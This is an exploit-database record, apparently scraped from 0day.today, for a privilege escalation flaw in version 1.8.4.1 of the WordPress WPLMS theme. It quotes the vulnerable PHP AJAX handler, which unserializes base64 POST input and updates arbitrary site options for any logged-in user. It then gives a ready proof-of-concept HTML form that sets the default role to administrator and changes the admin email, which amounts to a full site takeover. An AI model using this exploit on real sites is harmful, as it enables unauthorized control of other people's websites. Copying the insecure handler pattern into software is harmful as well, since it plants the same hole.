Description
WordPress WPLMS theme version 1.8.4.1 suffers from a privilege escalation vulnerability.
{"id": "1337DAY-ID-23263", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress WPLMS 1.8.4.1 Privilege Escalation Vulnerability", "description": "WordPress WPLMS theme version 1.8.4.1 suffers from a privilege escalation vulnerability.", "published": "2015-02-09T00:00:00", "modified": "2015-02-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/23263", "reporter": "Evex", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-03T19:41:27", "viewCount": 15, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://0day.today/exploit/23263", "sourceData": "------------------------------------------------------------------------------\r\nWordPress WPLMS Theme Privilege Escalation\r\n------------------------------------------------------------------------------\r\n\r\n[-] Author: Evex\r\n\r\nhttp://packetstormsecurity.com/user/evex/\r\ntwitter: https://twitter.com/Evexola\r\n\r\n[-] Theme Link:\r\n\r\nhttp://themeforest.net/item/wplms-learning-management-system/6780226\r\n\r\n\r\n[-] Affected Version:\r\n\r\nVersion 1.8.4.1\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located in the /includes/func.php\r\nscript:\r\n\r\n\r\nadd_action( 'wp_ajax_import_data', 'import_data' );\r\nfunction import_data(){\r\n $name = stripslashes($_POST['name']);\r\n $code = base64_decode(trim($_POST['code']));\r\n if(is_string($code))\r\n $code = unserialize ($code);\r\n $value = get_option($name);\r\n if(isset($value)){\r\n update_option($name,$code);\r\n }else{\r\n echo \"Error, Option does not exist !\";\r\n }\r\n die();\r\n}\r\n\r\n\r\nthen function import_data can be called by logged in users\r\nand executed which can lead to modifying wordpress settings and adding a\r\nnew administrator which may cause the site a full take over\r\n\r\n\r\n[-] Proof of Concept:\r\n\r\n\r\n(Must be submitted with a logged in user)\r\nOPTION:\r\nadmin_email, default_role, users_can_register\r\n\r\nValue(must be serialized then encoded by base64):\r\nusers_can_register (0,1)\r\n\r\ndefault_role (administrator, author, editor...)\r\n\r\nadmin_email( [email\u00a0protected] )\r\n\r\n<form action=\"http://domain.tld/wp-admin/admin-ajax.php?action=import_data\"\r\nmethod=\"post\" >\r\n <input type=\"hidden\" name=\"name\" value=\"OPTION\" />\r\n <input type=\"hidden\" name=\"code\" value=\"VALUE\" />\r\n <button type=\"submit\" >Submit</button>\r\n</form>\n\n# 0day.today [2018-04-03] #", "_state": {"dependencies": 1645260075, "score": 1659766679, "epss": 1678812679}}